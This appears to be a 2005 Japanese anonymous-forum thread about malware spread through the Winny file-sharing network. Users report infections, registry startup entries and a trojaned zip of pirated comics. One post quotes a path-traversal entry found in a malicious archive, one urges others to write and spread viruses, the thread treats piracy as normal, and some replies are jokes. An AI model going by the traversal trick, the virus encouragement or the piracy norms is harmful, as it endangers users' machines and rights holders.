05/02/07 09:38:03 jff/gz5V0
毎日風呂に入って下着も替えろ。
301:[名無し]さん(bin+cue).rar
05/02/07 15:06:38 fN/XNF0W0
それでも痒いんですが…。
302:[名無し]さん(bin+cue).rar
05/02/07 15:20:23 CjrSnF4v0
切れ!
303:[名無し]さん(bin+cue).rar
05/02/07 15:33:31 wnMIBQAD0
かゆくなるのは玉のほうだろ
304:[名無し]さん(bin+cue).rar
05/02/07 15:43:17 7gmUkW5G0
キンカン塗ると(・∀・)イイ!!
305:[名無し]さん(bin+cue).rar
05/02/07 15:46:19 +MnNa7vf0
メンソレータム塗るともっと(・∀・)イイ!
306:[名無し]さん(bin+cue).rar
05/02/07 15:49:58 3IIPwDdF0
質問にはテンプレを使いましょう。
307:[名無し]さん(bin+cue).rar
05/02/07 18:32:19 gVJkWv8j0
またウイルスか
マカフィー先生ありがとう
もう三回ぐらいひっかかってんな俺
308:[名無し]さん(bin+cue).rar
05/02/07 18:34:35 S7ePl6dF0
マカフィーの法則
309:[名無し]さん(bin+cue).rar
05/02/08 01:43:00 21r51iCG0
ちょいとお尋ねしますが、
他のファイル共有ネットワークでウィルスが
見つかった可能性があるなら、どこに報告すればいいの?
310:[名無し]さん(bin+cue).rar
05/02/08 02:06:21 XLylscR20
そのソフトの本スレじゃないの
311:[名無し]さん(bin+cue).rar
05/02/08 22:01:17 Gy40dB8A0
>>260
サンクス
完全解決しますた
312:[名無し]さん(bin+cue).rar
05/02/08 22:58:40 O3IVKmrB0
URLリンク(uploader.zive.net)
この写真削除したけど、開くとどうなるか詳細教えて
313:[名無し]さん(bin+cue).rar
05/02/08 23:05:05 e3wIJdWc0
どうにもならない手遅れ
314:[名無し]さん(bin+cue).rar
05/02/08 23:09:07 O3IVKmrB0
>>313
ウィルス名で言うと何になるんですか?
これ拡張子がjpgなのに、jpgが開くときの脆弱性を利用して、
ウィルスを混入させるんでしょ?正直どういう仕組みなのかよくわからん
教えてください。
315:[名無し]さん(bin+cue).rar
05/02/08 23:11:56 gb/Lwtpb0
>>314
そんなことより
その圧縮ファイルのアイコンはなんてソフトのもの?
316:[名無し]さん(bin+cue).rar
05/02/08 23:29:47 O3IVKmrB0
>>315
ラプラスだけど
で、ウィルスのプログラムに詳しい方ご教授ください。
317:[名無し]さん(bin+cue).rar
05/02/08 23:35:17 gb/Lwtpb0
>>316
㌧クス
318:[名無し]さん(bin+cue).rar
05/02/08 23:37:57 O3IVKmrB0
>>317
ちなみにスペルはLhaplusね
319:[名無し]さん(bin+cue).rar
05/02/08 23:44:27 idwot2um0
ここ久しぶりに来たけど苺キンタマ以来目立った新種は出てないみたいね。
320:[名無し]さん(bin+cue).rar
05/02/08 23:47:21 O3IVKmrB0
>>319
こち亀exe
321:[名無し]さん(bin+cue).rar
05/02/09 01:42:45 VKcaXPNN0
で、画像見ないでレスするけど>>312の画像ってあやしげなjpgをそのままうpしてんの?
対象をアーカイブに圧縮して「解凍してできるjpgが」ってなら話はわかるが、怪しげなファイルを
そのままうpしたんならウィルスうpしたってことだろ。違法じゃねーの?
322:[名無し]さん(bin+cue).rar
05/02/09 01:52:52 O2/Dnxa+0
この板で違法うpを咎めたところで野暮だよ
逮捕される奴は逮捕される
323:[名無し]さん(bin+cue).rar
05/02/09 02:19:03 xDzEKmpT0
>321
画像見ないでレスする意味がわからん
感染すると思ってビビるほどの低スキルなやつが偉そうに能書きたれるわけもないし
324:[名無し]さん(bin+cue).rar
05/02/09 02:25:39 Zpz0uABU0
とりあえず>>312よ
>1読まないにも限度があるぞ
325:[名無し]さん(bin+cue).rar
05/02/09 10:32:54 U6ZnYu+o0
このスレの基本的な流れはキンタマ並のウィルスが出回るまで待ちながら
その他の報告に「>>1読め」で無視する流れ
326:[名無し]さん(bin+cue).rar
05/02/09 12:08:11 j1h3syDn0
>>312
はウィルスでもなんでもない
デスクトップキャプチャしてるだけ。
害はないよ。
327:[名無し]さん(bin+cue).rar
05/02/09 13:15:25 wxOqPPuW0
半端にスカすとここまでレス進む
328:[名無し]さん(bin+cue).rar
05/02/09 16:24:59 2RGwgY250
age
329:[名無し]さん(bin+cue).rar
05/02/09 17:58:26 hh2/SOq10
しかし、なんだな
今更exeとかフォルダ偽装とか踏むやついるんだな
キンタマ級の新手が出てきても、そうそう踏ませるのが難しいのでは?
と思ったが。踏むやつはいつになっても踏むのか…、それとも新参も増えてるのか…
330:[名無し]さん(bin+cue).rar
05/02/09 18:38:25 oSvcFUc60
>>312
マジレスするとスパイウェアだがイマイチたいしたこと無い
放置しれ
331:[名無し]さん(bin+cue).rar
05/02/09 19:01:09 2d3y+TiF0
>>330
312の写真は金子で見れば、削除するけど
他のjpgファイルに組み込まれたら怖くないか
ってか、すでにあるの?
332:[名無し]さん(bin+cue).rar
05/02/09 19:51:00 PQZQLfXS0
今度はpngか・・・
333:[名無し]さん(bin+cue).rar
05/02/09 19:53:22 nXOstONM0
新作のプリ×キュアマダー?
334:[名無し]さん(bin+cue).rar
05/02/09 19:54:09 nXOstONM0
誤爆
335:[名無し]さん(bin+cue).rar
05/02/09 19:59:30 B3a3tz0V0
>>331
何言ってるのかさっぱりワカンネ
特に一行目
336:[名無し]さん(bin+cue).rar
05/02/09 20:43:40 3meF1n5f0
最近よくファイルやアプリが応答なしってなるんだけど
こんなウイルスってある?
337:[名無し]さん(bin+cue).rar
05/02/09 20:45:53 Jad6FhQ40
スレ違い。初心者スレに行ってくれ。
338:[名無し]さん(bin+cue).rar
05/02/09 20:56:07 2d3y+TiF0
>>335
金子の写真以外に
ウィルスが組み込まれたjpgはあるのか?ってこと
339:[名無し]さん(bin+cue).rar
05/02/09 20:57:53 xgVpt7RT0
金子の写真ってなに?
340:[名無し]さん(bin+cue).rar
05/02/09 20:58:48 B3a3tz0V0
> 金子の写真
('A`)……?
341:[名無し]さん(bin+cue).rar
05/02/09 21:01:55 2d3y+TiF0
金子は47氏のこと
>>312の写真は金子じゃないの?
342:[名無し]さん(bin+cue).rar
05/02/09 21:04:28 B3a3tz0V0
もう一度47氏の写真とその画像を見比べてごらん
同一人物に見える?
明日早速眼科か精神科に行った方が良いよ。
343:[名無し]さん(bin+cue).rar
05/02/09 21:08:13 2d3y+TiF0
>>342
そうなんだ、、、勘違いしてた。
まぁ誰かは知らないけどこの男の写真以外にも
危険なjpgってあるの?
344:[名無し]さん(bin+cue).rar
05/02/09 21:13:41 LTHSwe0q0
>この男の写真以外にも危険なjpg
自分の認識だと赤シャツ男は、初代ヌルポの副産物であって
無害だが鬱陶しいとそういう感じだったのだが…
345:[名無し]さん(bin+cue).rar
05/02/09 21:15:41 B3a3tz0V0
大体、もし赤服眼鏡の写真が危険なコードを含んでたら
>>312みたくサムネイルを見た時点で感染してるんじゃないか?
危険なJPGが(あるとして)他にも存在するか、という問いなら
あるかもしれない、と答えるだろう。
nyにあるか、というと誰にもわからないけどな。
まず無いと思うけど。
346:[名無し]さん(bin+cue).rar
05/02/09 21:22:01 xgVpt7RT0
危険なjpgってただの”.jpg .exe”とかじゃねえのか。
それとも俺の知らない間にjpgウィルス出回ってるの?
347:[名無し]さん(bin+cue).rar
05/02/09 21:27:13 2d3y+TiF0
掲示板なんかで、拡張子が.jpgのリンクでも実は画像じゃなくてウィルスサイトに飛ばされる
ことってあるじゃん。2ちゃんにもよく張られてる。
このことと、nyは関係が無いかもしれんが気になった。
348:[名無し]さん(bin+cue).rar
05/02/09 21:27:41 B3a3tz0V0
いや、確かJPGにあるコードを入れておくとウイルスになるっつーのはあった気がする。
でも俺の知ってる奴は、あらかじめexeがハードディスク内にある場合に限り発動するってやつだけど。
JPG画像ファイル単体でウイルスの役目を果たすようなものってまだ無いんじゃないか?
セキュリティホール突くのは別として。
349:[名無し]さん(bin+cue).rar
05/02/10 00:20:38 li/KneUL0
【使用OS】Win2000 SP4
【WindowsUpdateしてるか】はい
【使用AntiVirusソフト】Norton AntiVirus 2003
【AntiVirusをUpdateしてるか】はい
【ウイルススキャンの結果】検出なし
【テンプレを読んだか】はい
【症状、具体的に分かる限りすべて書く】
C:\temp000が作られ(中身は空)、UpFolder.txtに追記されてました。
他、ずっと昔に流行ったozawa.exeのような挙動(白目のない女性の恐怖画像が画面一杯に突然出る。ザザザーのような音も出る)が出てる
これ何すか?
350:[名無し]さん(bin+cue).rar
05/02/10 00:23:56 NZbrBGBV0
ここは初心者の質問・救済スレではありません
351:[名無し]さん(bin+cue).rar
05/02/10 00:43:16 ybgwBGKq0
>>349
でもノートン入ってるのにかかるなんておかしな話だ
352:[名無し]さん(bin+cue).rar
05/02/10 00:44:08 kTvOqxaG0
>>349
そういう挙動をするプログラムなんじゃないの?
353:[名無し]さん(bin+cue).rar
05/02/10 01:02:36 li/KneUL0
すいません、Antinny系でozawaな挙動を示すものなど聞いたこともないので
(検索しても見付からないので)質問してしまいました。
もちろん単なるozawa+Antinny同時感染も疑いました、が、
WIN.INIを確認したところRun=の行自体がなく、
ozawa.exeとmadoka.exeを全探索しましたが見付かりませんでした。
また出た。この女が。こわい...
354:[名無し]さん(bin+cue).rar
05/02/10 01:07:50 3EO3/V1T0
新種というか亜種だろうな
最新のウイルス定義でも全ての亜種を防ぐわけじゃないから
355:[名無し]さん(bin+cue).rar
05/02/10 01:08:16 L+wkb+490
タスクマネージャで怪しいプロセス片っ端から閉じろ
それから感染元は何か調べる。後はしらね
356:[名無し]さん(bin+cue).rar
05/02/10 01:17:44 jpXD2K630
>>353
再インスコしとけ、それが嫌ならその女一生飼っとけ。
357:[名無し]さん(bin+cue).rar
05/02/10 01:29:18 li/KneUL0
ともかくozawa部分だけでもどうにかしようとあがくも、どこから起動しているかすら分からない
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
ひとつひとつ検索したが、mp3infpとTweakMeUp以外全部ハードウェアもの
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceは空
前述の通りWIN.INIにRun=なし
しかし再起動するとozawa
358:[名無し]さん(bin+cue).rar
05/02/10 01:38:52 D7UbV5eS0
>>357
感染元のファイル名すら書かない君にぴったりの言葉を贈ろう
日記はチラシの裏に書け(AA略)
359:[名無し]さん(bin+cue).rar
05/02/10 01:42:43 nbd5RrmZ0
>357
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
とかスタートアップは?
あとはタスクマネージャのプロセスを全部調べるってとこか
360:[名無し]さん(bin+cue).rar
05/02/10 02:10:23 E/bQZxZE0
>>357
ノートンに報告入れといてね
361:[名無し]さん(bin+cue).rar
05/02/10 02:28:40 zzy+oPI00
みんな踏みまくってるよ。フォルダ偽装なんて知らないやつだらけ。
ウイルスなんて自分は関係ないと思ってる。
362:[名無し]さん(bin+cue).rar
05/02/10 02:54:42 H8Cx+fOD0
>白目のない女性の恐怖画像が画面一杯に突然出る。
>ザザザーのような音も出る
わかっててもコワイな
363:[名無し]さん(bin+cue).rar
05/02/10 05:08:57 vgDMncNg0
ウイルスじゃないから、PCに盛り塩するといいよ。
364:[名無し]さん(bin+cue).rar
05/02/10 05:12:02 psrLZGN30
窓から投げ捨てろ
365:[名無し]さん(bin+cue).rar
05/02/10 06:32:54 Js4DoeKW0
ウイルス撒くやつも踏ませようといろいろ考えてるね
CG集の前編フォルダなるものにはちゃんと画像をいれてて
後編フォルダなるものが.folderなのはワロタよ
366:[名無し]さん(bin+cue).rar
05/02/10 07:54:05 li/KneUL0
>>359
ビンゴ>HKCU
Microsoft製品ではないsyscheck.exeがC:\WINNTにありました
HKCUにもRunがあったとは...
367:[名無し]さん(bin+cue).rar
05/02/10 14:07:06 0o5Ll/4G0
除霊されますた
368:[名無し]さん(bin+cue).rar
05/02/10 21:46:13 LVJVrD/UO
W32/Pate.b
ってウイルスに感染してしまいました。
ダウンロードしたファイルは一応スキャンしたんですが・・・
とりあえずググッてみても駆除方法がわかりません
バカなワシにご指導を・・・
369:[名無し]さん(bin+cue).rar
05/02/10 22:25:45 A33DbpE40
/" ̄'ヽ, /" ̄ヽ,
/ , i. / i
,' / i-─-.,' / ',
! ,' .i i / 、 i
.! .!'ー'´ 'ー"´ ヽ i
! ! ,ヘ , λ , ,イ ',__,ノ
ヽ,_ _,ノr'-+ーイ ノ -i- 、i ゝ
)  ̄.レイ r;:=-;、レ゙ r;=;:t iイノイ
i i .! ヒ__,! ヒ_,!! ,' i、
/ i λ."" ! .i
i .人 ゝ - ,.イ /〈
) ノヽノ、レ'イ`yー--r ,くリレ'ヽノ
レヽr ´ゝ,.-- 、`ー-ー'y- 、
/ / 、ノ777777777777t
i i ||| |
ゝr⌒/ . ||| .知っているが |
', ´ .||| .お前の態度が|ヽ
, '"y- イ||| 気にいらない r'^ヽ
',/ ./||| ( i
/ ll.L___________________」ー'"
370:[名無し]さん(bin+cue).rar
05/02/10 22:36:07 C+9Iu0zT0
>>368
先ず最初に>>1じっくり見つめるんだ
そして深呼吸をして1行1行丁寧に詠んで行く
リズムは乱さないようにな
そうすれば何をするべきかが見えてくるぞ
371:[名無し]さん(bin+cue).rar
05/02/10 22:37:02 QU524JCE0
今日の朝、ノートン2005のログを見ていたらファイルを
ウイルススキャンしてW32.HLLW.Antinnyが引っかかり手動で削除しましたと
あったのですが感染を水際で防ぎ感染していないとみていいのでしょうか?
念のためシステムの完全スキャンをしてみても何もひっかかり
ませんでした。nyが入っている外付けHDDも一応スキャンしても何も検出
されず、感染したと思われる兆候も見た感じではないみたいです。
昨晩私が寝ている間に
ファイルを開こうとした●が開く前?にウイルススキャンをして何かを
削除したこと、削除後そのファイルを開こうと必死になったこと
しか把握してなくてウイルス入りファイルを実行しちまったのか
覚えてなくて困ってます。
372:[名無し]さん(bin+cue).rar
05/02/10 22:42:10 3EO3/V1T0
アンチウイルスソフトが何のためにあるのかと(ry
373:[名無し]さん(bin+cue).rar
05/02/10 23:17:31 dg5QlmdD0
つか>>1をちゃんと読んだのかと(ry
374:[名無し]さん(bin+cue).rar
05/02/10 23:46:34 TGY6uaPC0
ノートン先生も報われないよな
375:[名無し]さん(bin+cue).rar
05/02/10 23:47:57 SmFl9iFM0
こんなところでてぬを見ることになるとは思わなかった
376:[名無し]さん(bin+cue).rar
05/02/11 00:08:26 Z6O4gaKm0
先生はワーカホリック
377:[名無し]さん(bin+cue).rar
05/02/11 02:30:28 /5B8jTis0
>>371
検疫ログ見ればどのファイルか分かるだろうから、
もう一度キャッシュからファイル変換してみ。
先生、怒らないから。
ついでにバックアップを提出しとけ。
378:[名無し]さん(bin+cue).rar
05/02/11 03:03:08 4cp1HU0N0
W32.HLLW.Antinny について質問させていただいて、よろしいでしょうか?
379:[名無し]さん(bin+cue).rar
05/02/11 03:05:33 WgRPIS2p0
>>1
380:378
05/02/11 03:11:11 4cp1HU0N0
>>379
あっ!すすみません!
改行がおおすぎる、とゆわれたので2つにわけます。
【使用OS】
Windows2000 Professional
【WindowsUpdateしてるか】
あまりしていません・・
【AntiVirusは何を使っているか】
antivirusを知りません。。ごめんなさい。。
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
W32.HLLW.Antinny
Program FilesのCommon Files→Microsoft Shared→MSInfo→msinfo32.exe
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
1.起動している最中に本体から変な音がする(ガガガガ等)
2.windows画面になった途端、ポーンとエラー音がなる(怪しすぎる!)
3.マウスの調子が悪くなる(ダスクトップにあるアイコンはクリックできない)
4.スタートメニューからコントロールパネルを開こうとしても開かない
5.スタートメニューからエクスプローラで開くとうまくいく(場合がある)
6.エクスプローラからコントロールパネルを開こうとすると「アクセスは拒否されました」
のようなエラーメッセージが出る
7.ウイルスチェックをすると2つ見つかり、1つは駆除できましたがもう1つは出来ず
再起動してもう一度ウイルスチェックすると、なぜかウイルス検出0になっている。
8.2時間ほどパソコンを放っておくと通常どうり操作可能になる。
381:378
05/02/11 03:12:36 4cp1HU0N0
【何をしたらそんなことになったのか】
いきなり突然、です。同居者と共有しているもので、明確にはわからないです。
【これまでにとった措置】
ウイルスを削除。
W32.HLLW.Antinny はwinnyを狙ったワームと聞きましたが
私はwinnyを使ったことがありませんし、このファイルももっていません。
winnyを使ってない人の所へ入ったり、又、入ったとして被害が出たりするのでしょうか?
よろしくお願いします!
382:[名無し]さん(bin+cue).rar
05/02/11 03:23:18 6uJ6wsXI0
>>380
単にHDDが壊れかけだけなんじゃ。
383:[名無し]さん(bin+cue).rar
05/02/11 03:27:00 xDS0Wek10
>>380
Program Filess下のmsinfo32.exeを上書き(?)って初見だな、2000特有のものらしいし
取りあえずぁゃιぃプロセスを止めて、親ファイル削除、そしてレジストリ修復
まぁ、他にもなんか感染してそうだし素直にクリーンインスコを勧める
因みにny使用者でなくても物を踏めば感染する
どうでも良いが、「いう」を「ゆう」と表記するのは止めた方が良い
384:[名無し]さん(bin+cue).rar
05/02/11 03:31:31 Dl+HrxDX0
>>380
その「同居人」とやらがWinnyを使ってないという保証もないしな。
385:[名無し]さん(bin+cue).rar
05/02/11 03:50:02 Rsui7PMx0
>>379は
『まず、ここは初心者の質問・救済スレではありません。』
のことを示したかったと思うんだがどうよ
386:[名無し]さん(bin+cue).rar
05/02/11 04:59:27 SWWJjqCl0
どう考えてもそうだろ
387:[名無し]さん(bin+cue).rar
05/02/11 05:51:29 j8Jgm6140
しかもage質ときたもんだ
388:[名無し]さん(bin+cue).rar
05/02/11 10:13:46 1Hlxlk8c0
てゆーかnyを使った事もない人間が、antinyだからってこのスレに来たって言うわけ?
普通このスレ見つけるより先にセキュ板かなんかにいくと思うんだが。
まぁそれはそれとして。
スタートアップ系のチェックと現プロセスの確認ってところじゃないのかあとは。
全フォルダ精査してnyが無いか探してみるとか。
OS再インストールが最強。
389:やりすぎ
05/02/11 10:55:28 B8b+zTyqO
仙台凶暴だな
マイドキュメント直撃かよ。。。
390:378
05/02/11 13:05:47 4cp1HU0N0
どうもありがとうございました。
今日は変な音もしませんでしたし、操作は何故かスムーズにいきました。
もうちょっと様子をみてから色々ためしてみます!
391:[名無し]さん(bin+cue).rar
05/02/11 13:24:19 r5q7HNlK0
.me11p0
ってファイルが流れてて
ためしに落として調べたらパス付きzipだった
中身はどうやら.IAF
URLリンク(ccfa.info)
これってやばくないか?
392:[名無し]さん(bin+cue).rar
05/02/11 13:35:03 y8XwQ1fv0
そりゃデータ元の人間にとってはやばいだろうな。メルアド悪用されるかもしれんし
.me11p0ってめるぽか
393:[名無し]さん(bin+cue).rar
05/02/11 14:04:50 nhGdSyay0
一言だけ言っておくけどな
ここはsage推奨じゃないぞ
基本的に質問するときはageるものだ
394:[名無し]さん(bin+cue).rar
05/02/11 14:22:34 2hSJUG150
age質もあくまで最新ノートンやバスターで検出されないものに限るけどな
395:[名無し]さん(bin+cue).rar
05/02/11 14:26:24 j8Jgm6140
>>393
一言だけ言っておくけどな
ここは質問スレじゃないぞ
基本的に質問するときは質問スレでするものだ
396:[名無し]さん(bin+cue).rar
05/02/11 16:01:33 nhGdSyay0
>>395
なるほど。
397:[名無し]さん(bin+cue).rar
05/02/11 16:07:10 z5wHpDot0
ちょっとスレ違いかも
そもそもWinnyを媒介にするウイルスってUpFolder.txtを書き換えて拡散させようとするんだから、
WinNT系ならUpFolder.txtの属性を、読み込みのみ書き込み拒否属性に書き換えればウマーなんじゃないかと
欄検眼段のウイルスにかかった友達のPCを直してて気づいた
何で早く気づかなかったんだろう自分
398:[名無し]さん(bin+cue).rar
05/02/11 16:23:18 y8XwQ1fv0
>>397
では次は実験だ
読み取り専用にしたaaa.txtと、別のフォルダにもう一つaaa.txtを用意して、
読み取り専用でないほうを読み取り専用のaaa.txtがあるフォルダに移動してみるんだ。
まあそれ以前に、ワーム系の機能がなくともローカルフォルダのものを勝手にうpさせられることが十分痛手なんだから
拡散防止措置を考える前にウイルスプログラムを実行しないようにしろってこった
399:インリン
05/02/11 17:47:25 B8b+zTyqO
エロゲーイメージをマウント。。。
なんだなみんな。きっと
400:[名無し]さん(bin+cue).rar
05/02/11 18:09:31 Jqo5N8BU0
>>397
URLリンク(www.microsoft.com)
> 一度プログラムを実行すると、
> そのプログラムはあなた自身がコンピュータで実行できる処理を
> 何でも行うことができるようになります。
401:[名無し]さん(bin+cue).rar
05/02/11 18:18:28 NbmY9W1i0
>>399
で?
402:[名無し]さん(bin+cue).rar
05/02/11 18:36:52 B8b+zTyqO
お疲れさまです(笑)
403:[名無し]さん(bin+cue).rar
05/02/11 21:25:37 7ioOqnvqO
初めまして。突然ですが質問させてください。
1週間くらいnyを起動しっ放しで
今日久しぶりにパソコンをいじってみたら
なぜか重いのでとりあえず再起動してみたら
パスワードが間違ってい るで(正確なパスなのに)ユーザーログインできません。
ユーザーアカウントはこれ一つなので
今何もできない状態です。
このようなことをするウイルスは出回っているのでしょうか?
今は携帯からアクセスしています
どうかご指摘お願いします。
404:[名無し]さん(bin+cue).rar
05/02/11 22:19:05 BaTs3hlv0
>>403
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――‐┬┘
____.____ | .__ パソコンを
| | | | |\_\ 窓から
| | ∧_∧ | | | |.◎.| 投げ捨てろ
| |( ´∀`)つ ミ | | |.: |
| |/ ⊃ ノ | | .\|.≡.|
 ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |  ̄ ̄
405:[名無し]さん(bin+cue).rar
05/02/11 22:45:48 uQxbXYyh0
スマソ。色々調べてみたんだけど、よくわからんのでお聞きします。
XP起動時にHDからアクセス音が止まりません。タスクマネージャを開いてみると
「MM」というプログラムが実行されており、このタスクを終了させるとHDへの
アクセスは止まります。プログラムのアイコンはUNと書かれたものでした。
これって何なんでしょうか?
406:[名無し]さん(bin+cue).rar
05/02/11 22:49:30 Rsui7PMx0
(´・ω・`)しらんがな
407:[名無し]さん(bin+cue).rar
05/02/12 00:11:08 aJ0bMzDt0
質問テンプレも読まないやつが厚顔無恥に書き込むこんな世の中じゃ(ry
408:[名無し]さん(bin+cue).rar
05/02/12 00:17:15 rXp7usQA0
ポイズン
409:[名無し]さん(bin+cue).rar
05/02/12 03:02:31 m1VjmALg0
WinXPSP2、WU済み
ノートンUpdate済み
(一般コミック・雑誌) [ジャンプ] [2005-11] DEATH NOTE page.57 「二択」.zip UperOOnise 1b1ee36abf324cf4ccdaca3d245391f4
に入ってたexe踏んじゃった・・・
zip解凍するとWinRARアイコンのexeファイル(サイズ:2.28 MB)とUpper.mp3
exe実行でデスクトップキャプチャ(ユーザー名のデスクトップ.bmp)、
壁紙変更(まだ懲りないの?.bmp *内容:晒されたっていいじゃないの 泥棒だもの ぬるぽ)
MP3は先に消したので分からないが、音が鳴るのかも
nyのiniにぬるぽ無し、Upフォルダ追加無し、Upfolder.txt追記無し
レジストリはよく分からないが、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
には変わった値はない気がする
Cドライブを.exeで検索後、更新日時、作成日時でソートしたが怪しいファイルは見つからず
ウィルススキャンしても検出出来ず
これは既出?
410:[名無し]さん(bin+cue).rar
05/02/12 03:02:49 jfgwByGq0
<404
国へ帰れ。
411:[名無し]さん(bin+cue).rar
05/02/12 03:13:46 Q3/xb0y10
「晒されたっていいじゃないか泥棒だもの ぬるぽ」
ウィルスに引っかかって勝手に変えられた壁紙だけど・・・ケッコー気に入った。
ちょうど壁紙探してたから感謝感謝!
412:409
05/02/12 03:27:25 m1VjmALg0
壁紙うpしてみる
bmpだと2Mもあるからpngで。
URLリンク(sylphys.ddo.jp)
なんだか今のところ痛くもかゆくもないんだけど・・・
これから何かあるんだろうか?
一応スタートアップも確認したし、今日はとりあえず寝るかな
413:[名無し]さん(bin+cue).rar
05/02/12 04:31:38 /TNDgjXk0
>409
既出というか、ちょろっと落として先頭ブロック表示しただけで
かっとばせヌルポース.zip とか /../../../../../Documents and Settings/All Users/~
とかいう文字が見えた時点で(ry
414:[名無し]さん(bin+cue).rar
05/02/12 08:41:38 tt0na5K10
>>403
Numlockじゃねーの。
ウイルスだとしたらご愁傷様。それと報告乙。
415:[名無し]さん(bin+cue).rar
05/02/12 08:42:28 tt0na5K10
間違えたCapslockだ
416:[名無し]さん(bin+cue).rar
05/02/12 10:36:54 HvsYg15v0
ノートPCだと、ものによってはNumLockで引っかかってる事もある
417:409
05/02/12 10:53:59 m1VjmALg0
>>413
よく分からないけど、こいつはヌルポース?
解凍にはnoah使ったから、変な場所に解凍される事はないと思うけど、
exe踏んだ後の活動内容がよく分からない。
実行時にSS撮って壁紙変えただけで、マイドキュメントとかWinnyフォルダに変なファイル
作るわけでもなく・・・
>>411は何か起きたのかなー
418:[名無し]さん(bin+cue).rar
05/02/12 12:40:43 R/LTPj740
>413 おまい様が途中まで落としたってのは、こっちでは?
84 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:05/02/09(水) 16:19:18 ID:UIxh++l70
(一般コミック・雑誌) [ジャンプ] [2005-11] DEATH NOTE.zip 3,368,888 f5a386c0b77f778bd5eaa18e11a0d5f8
92 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:05/02/09(水) 16:24:43 ID:VFelumFG0
>84 の方のは偽っていうかウィルスっぽいの詰め合わせかな
419:[名無し]さん(bin+cue).rar
05/02/12 13:09:29 wqszjevM0
.me11p0のパスってなんなんだろうな
もしかして作者しか知らないって奴か?
420:397
05/02/12 13:26:01 5xwzIgRG0
>>398
一応実験結果
コピー不可 cmd.exeからでも無理
エディッタ読めても上書き不可
ファイルの所有者を別ユーザーにして実行者と分けているためMSのファイル管理にバグか
ウイルスが所有権を書き換えて書き込み許可をつけなければ書き換えられない。
一応保険の気休めにしかならないです。
一番良いのはワームを踏まないことなのは十分承知
421:[名無し]さん(bin+cue).rar
05/02/12 15:00:45 smIwQcq20
いやーびっくり
俺も>>409とまったく同じ状態だ
なんとなく怖いから現在はサブノートを
使っている状態だ
422:[名無し]さん(bin+cue).rar
05/02/12 15:10:56 smIwQcq20
追記。
win.iniの方にぬるぽガッが入ってた
これは昔感染したウィルスの名残かもしれないから
俺だけの可能性もあるけど一応見てみてくれ
423:[名無し]さん(bin+cue).rar
05/02/12 15:36:05 AdeU+lvr0
オンラインなマシンで妙な挙動やうさんくさい痕跡が見つかったら、
すぐに切断&初期化&新規インスコしないってのは何故なんだ。検証
報告は仮想マシンやオフラインでやるってのが筋だろうに。
昔感染した名残とか平気な顔して言えることか?(´・ω・`)
424:[名無し]さん(bin+cue).rar
05/02/12 17:14:24 eat95GIf0
ウィルスどんどん作って流せ。
425:409
05/02/12 18:39:14 m1VjmALg0
ごめん、検証するスキルのない俺が来るべきスレではなかったね
exe踏んだの初めてだったからちょっとパニくったんだ
面倒だけどクリーンインスコするよ
またノートン先生の使用期限伸びるな・・・
426:[名無し]さん(bin+cue).rar
05/02/12 18:58:07 0vTAE1Wd0
ノートン先生とAVG7とBitDefenderでウィルス対策しております
有効に働いてくれているので感謝しています
しかしノートン先生とAVGだけでも良いような気がしてきた今日この頃です
427:[名無し]さん(bin+cue).rar
05/02/12 21:14:16 eYincy+g0
ノートンだけでもいいんじゃないか
誤作動がうざいが設定でなんとかなるし
428:[名無し]さん(bin+cue).rar
05/02/12 21:31:06 hECHz0Aq0
>>426
ノートンとAVGを併用するメリットが分からない
それの組み合わせなら、ノートンだけかAVG+BitDefenderでいいじゃん
429:[名無し]さん(bin+cue).rar
05/02/12 22:58:10 7zwpKvk70
antinnyに関してだけなら
Norton > AVG > Bit
Bit削っても問題ない。
430:426
05/02/12 23:15:01 AUdkDUq80
>>427
>>428
>>429
わざわざ答えていただきありがたいです
玄人様の意見、参考にさせていただきます
431:[名無し]さん(bin+cue).rar
05/02/12 23:17:13 AdeU+lvr0
>>429
常駐がダブってるとあんまりいくないような気がする。
432:[名無し]さん(bin+cue).rar
05/02/12 23:23:27 pMaM0ZSl0
>>430
わざわざ皮肉言いに来たのか、ご苦労さま
433:[名無し]さん(bin+cue).rar
05/02/13 00:12:06 VJHb0qjp0
>>432
わざわざageてまで言うことか?
434:[名無し]さん(bin+cue).rar
05/02/13 00:14:37 VJHb0qjp0
ところでこの板のIDの末尾って0かOで固定されてんの?
435:[名無し]さん(bin+cue).rar
05/02/13 00:24:35 qUpCYDEj0
またか・・・
436:[名無し]さん(bin+cue).rar
05/02/13 00:36:55 hYbU6/tO0
>>434
m9(^Д^)プギャー
437:[名無し]さん(bin+cue).rar
05/02/13 00:37:49 J4hwylB60
0が男の書き込みでOが女の書き込み
分かったか低脳
438:[名無し]さん(bin+cue).rar
05/02/13 00:40:43 w91NqGDp0
女イネ━━━('A`)━━━ !!
439:[名無し]さん(bin+cue).rar
05/02/13 00:48:07 P8bsgGGW0
[俺のアドレス帳]とかいうの流れてんの確認したけどこれは新種か?
440:[名無し]さん(bin+cue).rar
05/02/13 00:57:23 sSll5S2D0
いきなりウイルスが入って、気づけば消えてるってことありますか?
441:[名無し]さん(bin+cue).rar
05/02/13 01:40:18 /eSYWRiD0
ダウンしただけじゃ感染しないよ。
442:[名無し]さん(bin+cue).rar
05/02/13 02:56:19 gyGj6etUO
女
443:[名無し]さん(bin+cue).rar
05/02/13 03:20:37 jKSAIGFA0
んじゃぁ、俺はどっちだ
444:[名無し]さん(bin+cue).rar
05/02/13 05:19:29 S5wqXwBc0
ネカマ
445:[名無し]さん(bin+cue).rar
05/02/13 10:02:37 vSr3w6E60
>>439
>>11
446:[名無し]さん(bin+cue).rar
05/02/13 10:26:02 FfIijSVE0
>>409の詳細マダー?
447:[名無し]さん(bin+cue).rar
05/02/13 10:31:16 vSr3w6E60
ビューワソフトでも入ってたんじゃねか
448:[名無し]さん(bin+cue).rar
05/02/13 12:39:01 NY04I2Ol0
俺も>>409踏んじまったんだが
壁紙変えて画面キャプチャするだけのウィルスなんてあんのかな?
